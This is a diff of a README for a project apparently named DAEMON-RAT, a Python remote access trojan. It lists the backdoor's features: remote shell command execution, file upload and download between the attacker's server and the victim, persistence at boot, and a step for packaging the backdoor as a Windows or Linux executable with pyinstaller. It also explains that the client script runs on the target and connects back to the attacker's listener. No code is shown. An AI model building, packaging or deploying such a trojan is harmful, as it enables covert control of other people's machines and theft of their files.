NavdeepNormie/DAEMON-RAT/README.md

 - Remote shell command execution
 - File download from client to server
 - File upload from server to client
-- persistent so it boots whenever client opens their system
+- Persistent so it boots whenever client opens their system
+- Use pyinstaller to convert daemon.py in a linux or windows executable after making changes to the backdoor

 ## How it works

-- `daemon.py` runs on the target machine and connects to the attacker's server.
+- `daemonRAT.py` runs on the target machine and connects to the attacker's server.
 - `listener.py` lets you control the target machine by sending commands like:
   - `upload filename`
   - `download filename`